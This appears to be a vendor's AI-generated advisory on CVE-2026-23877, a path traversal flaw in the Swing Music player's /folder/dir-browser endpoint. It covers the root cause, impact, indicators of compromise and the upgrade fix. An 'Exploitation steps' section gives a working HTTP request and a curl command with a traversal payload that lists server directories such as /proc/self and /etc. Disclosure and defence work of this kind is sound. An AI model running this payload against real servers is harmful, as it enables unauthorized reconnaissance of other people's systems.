CVE-2026-23877: 
Python vulnerability analysis and mitigation

Overview

CVE-2026-23877 is a directory traversal vulnerability in Swing Music, a self-hosted music player for local audio files. The flaw exists in the list_folders() function exposed via the /folder/dir-browser endpoint, allowing any authenticated user — including non-admin accounts — to browse arbitrary directories on the server filesystem. All versions prior to 2.1.4 are affected. The vulnerability was disclosed on January 18, 2026, and carries a CVSS v3.1 base score of 4.3 (Medium) and a CVSS v4.0 base score of 5.3 (Medium) (Github Advisory, Feedly).

Technical details

The root cause is classified as CWE-25 (Path Traversal: /../filedir) and CWE-284 (Improper Access Control). The @api.post("/dir-browser") endpoint in src/swingmusic/api/folder.py lacked both proper authorization enforcement and path canonicalization: it attempted to prepend / to non-existent paths, but this did not prevent traversal sequences such as /music/../proc/self/ from resolving outside the intended music directory. No admin privilege check was applied to the endpoint prior to the fix. The patch (commit 9a915ca) resolves paths using pathlib.Path.resolve(), validates them against configured root directories, and adds an @admin_required() decorator to the list_folders() function (Github Advisory, Patch Commit).

Impact

Successful exploitation allows an authenticated attacker to enumerate arbitrary directories on the server filesystem, bypassing the intended restriction to music library paths. This can expose sensitive information including configuration file locations, system file paths, user account names from directory listings, installed software versions, and log file locations. While integrity and availability are not directly impacted, the information gathered can serve as reconnaissance for follow-on attacks such as local file inclusion (LFI) or remote code execution (RCE) (Github Advisory).

Exploitability

A public proof-of-concept is included in the official security advisory, demonstrating exploitation via a simple curl command with a crafted JSON body containing a traversal path. There is no evidence of in-the-wild exploitation or threat actor attribution at this time. The EPSS score is approximately 0.073% (22nd percentile), indicating low near-term exploitation probability. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog (Github Advisory, Feedly).

Exploitation steps

  1. Obtain credentials: Acquire any valid Swing Music user account — admin privileges are not required. Self-registered or low-privilege accounts are sufficient.
  2. Authenticate: Log in to the Swing Music instance (default port 1970) and capture the access_token_cookie from the session.
  3. Craft traversal request: Send a POST request to /folder/dir-browser with a path containing ../ sequences to escape the music root directory:
POST /folder/dir-browser HTTP/1.1
Host: <TARGET_IP>:1970
Content-Type: application/json
Cookie: access_token_cookie=<non-admin-token>

{"folder":"/music/../proc/self/", "tracks_only":false}
  1. Execute with curl: Use the --path-as-is flag to prevent the client from normalizing the traversal path:
curl --path-as-is -i -s -k -X POST -H 'Content-Type: application/json' \
  -b 'access_token_cookie=<token>' \
  --data-binary '{"folder":"/music/../proc/self/", "tracks_only":false}' \
  http://<TARGET_IP>:1970/folder/dir-browser
  1. Enumerate filesystem: Analyze the JSON response listing subdirectories (e.g., /proc/self/fd, /proc/self/net) and iterate with different traversal paths to map sensitive directories such as /etc, /home, or application configuration paths (Github Advisory).

Indicators of compromise

  • Network: Repeated POST requests to /folder/dir-browser from authenticated sessions, particularly containing path components such as ../, /proc/, /etc/, or other non-music directories in the request body.
  • Logs: Swing Music access logs showing POST requests to /folder/dir-browser with JSON bodies referencing paths outside configured root music directories; HTTP 200 responses to such requests on unpatched versions.
  • Behavioral: Unusual directory enumeration patterns in application logs where the folder parameter resolves to system paths (e.g., /proc/self, /etc, /home) rather than music library paths.

Mitigation and workarounds

Upgrade Swing Music to version 2.1.4 or later, which resolves the vulnerability by adding path canonicalization via pathlib.Path.resolve(), validating paths against configured root directories, and restricting the /folder/dir-browser endpoint to admin users only. As an interim workaround, restrict network access to the Swing Music application to trusted users and networks only, and audit user accounts to minimize the number of authenticated users. Review access logs for suspicious directory browsing activity targeting the /folder/dir-browser endpoint (Github Advisory, Patch Commit).

Additional resources


Source: This report was generated using AI

Related Python vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

GHSA-v2f8-6655-7grjCRITICAL10
  • Python logoPython
  • vibe-trading-ai
NoYesOct 02, 2026
CVE-2026-105782HIGH7.5
  • Python logoPython
  • scrapy
NoYesOct 06, 2026
GHSA-v853-p72q-4cfwHIGH7.5
  • Python logoPython
  • quart
NoYesOct 05, 2026
CVE-2026-105751MEDIUM6.9
  • Python logoPython
  • docling
NoYesOct 05, 2026
CVE-2026-105750MEDIUM5.9
  • Python logoPython
  • docling
NoYesOct 05, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management